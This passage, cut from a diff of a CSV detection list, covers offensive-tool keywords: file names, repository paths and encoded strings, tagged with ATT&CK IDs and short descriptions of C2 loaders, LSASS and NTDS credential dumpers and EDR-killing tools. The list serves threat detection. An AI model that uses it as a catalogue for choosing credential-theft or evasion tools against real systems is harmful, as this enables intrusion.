- T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*Y2F0Y2hldHVtYm90aWZ5b3VjYW4-*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*yanncam/ShuckNT*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" @@ -18570,45 +18758,46 @@ "*Yay! No SYSMON here!*","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","0","N/A","N/A","1","81","15","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" "*YDHCUI/csload.net*","offensive_tool_keyword","cobaltstrike","A cobaltstrike shellcode loader - past domestic mainstream antivirus software","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/csload.net","1","1","N/A","10","10","123","13","2021-05-21T02:36:03Z","2021-05-20T08:24:16Z" "*YDHCUI/manjusaka*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" -"*Yh0Js82rIfFEbS6pR7oUkN0Use54pIZBa3fpYprAMuURNrZZGc6cM8dc+AC*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1321","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" -"*ylAo2kAlUS2kYkala!*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*yeelight_discover.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*Yh0Js82rIfFEbS6pR7oUkN0Use54pIZBa3fpYprAMuURNrZZGc6cM8dc+AC*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" +"*ylAo2kAlUS2kYkala!*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" "*Yml0c3kubWl0LmVkdQ==*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*YmpwZW5uaXNhbmF3ZXNvbWVmaWdodGVy*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*YmxvY2s9MTAw*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" -"*yogeshojha/rengine*","offensive_tool_keyword","rengine","reNgine is an automated reconnaissance framework for web applications with a focus on highly configurable streamlined recon process via Engines recon data correlation and organization continuous monitoring backed by a database and simple yet intuitive User Interface. reNgine makes it easy for penetration testers to gather reconnaissance with","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/yogeshojha/rengine","1","1","N/A","N/A","10","5904","923","2023-10-02T14:05:29Z","2020-05-03T12:13:12Z" +"*yogeshojha/rengine*","offensive_tool_keyword","rengine","reNgine is an automated reconnaissance framework for web applications with a focus on highly configurable streamlined recon process via Engines recon data correlation and organization continuous monitoring backed by a database and simple yet intuitive User Interface. reNgine makes it easy for penetration testers to gather reconnaissance with","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/yogeshojha/rengine","1","1","N/A","N/A","10","5913","923","2023-10-02T14:05:29Z","2020-05-03T12:13:12Z" "*YOLOP0wn/POSTDump*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z" -"*You are trying to target a User Group Policy Object while running the embedded SMB server*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"*You are trying to target a User Group Policy Object while running the embedded SMB server*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" "*You_spin_me__round.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*youcantpatchthis*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","0","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" "*youhacker55/PayGen*","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","","N/A","","","" -"*Your Moms Smart Vibrator*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","user-agent","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*ysoserial -*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"*ysoserial-*.zip","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"*ysoserial.exe *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*Your Moms Smart Vibrator*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","user-agent","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*ysoserial -*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*ysoserial-*.zip","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*ysoserial.exe *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "*ysoserial.exe*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" -"*ysoserial.net*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"*ysoserial.sln*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*ysoserial.net*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*ysoserial.sln*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "*yunuscadirci/CallStranger*","offensive_tool_keyword","POC","Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration","T1046 - T1595 - T1587","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/yunuscadirci/CallStranger","1","1","N/A","N/A","4","391","70","2021-08-07T16:48:55Z","2020-06-08T07:37:49Z" "*Yuuup!! Pass Cracked*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","0","N/A","7","10","N/A","N/A","N/A","N/A" "*YwBhAGwAYwA=*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "*Z29oYWxleWdvYW5kaGFja2F3YXl0aGVnaWJzb24*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*Z4nzu/hackingtool*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39264","4347","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*Z4nzu/hackingtool*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" "*zabbix_session_exp.py -*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/random-robbie/cve-2022-23131-exp/blob/main/zabbix.py","1","0","N/A","N/A","1","8","7","2022-02-23T16:37:13Z","2022-02-23T16:34:03Z" "*zabbix_session_exp.py https*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1505 - T1550 - T1574 - T1210 - T1110","TA0001 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Fa1c0n35/zabbix-cve-2022-23131","1","0","N/A","N/A","1","0","0","2022-02-27T11:31:02Z","2022-02-27T11:30:53Z" "*zabbix_session_exp.py*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/cve-2022-23131","1","1","N/A","N/A","2","146","48","2022-02-24T15:02:12Z","2022-02-18T11:51:47Z" "*zarp.py*","offensive_tool_keyword","zarp","A network attack framework.","T1484 - T1498 - T1569","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/hatRiot/zarp","1","0","N/A","N/A","10","1376","340","2023-05-01T20:18:05Z","2012-09-16T18:02:34Z" -"*zblurx/certsync*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","6","566","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*zblurx/certsync*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" "*zblurx/dploot*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" "*zcgonvh/DCOMPotato*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" -"*zed2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*zenoss_3x_command_execution*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*zer0condition/mhydeath*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","251","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*zed2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*zenoss_3x_command_execution*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*zer0condition/mhydeath*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*zeroday-powershell*","offensive_tool_keyword","zeroday-powershell","This will exploit the Windows operating system allowing you to modify the file Some.dll.","T1203 - T1574.001 - T1546.011","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/OneLogicalMyth/zeroday-powershell","1","1","N/A","N/A","4","323","96","2018-09-12T09:03:04Z","2018-09-10T16:34:14Z" "*zerologon clone *https*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*zerologon.py*","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1071","TA0008 - TA0006","N/A","N/A","Exploitation tools","https://github.com/michaelpoznecki/zerologon","1","1","N/A","N/A","1","9","4","2020-09-15T16:31:59Z","2020-09-15T05:32:24Z" "*zerologon.x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 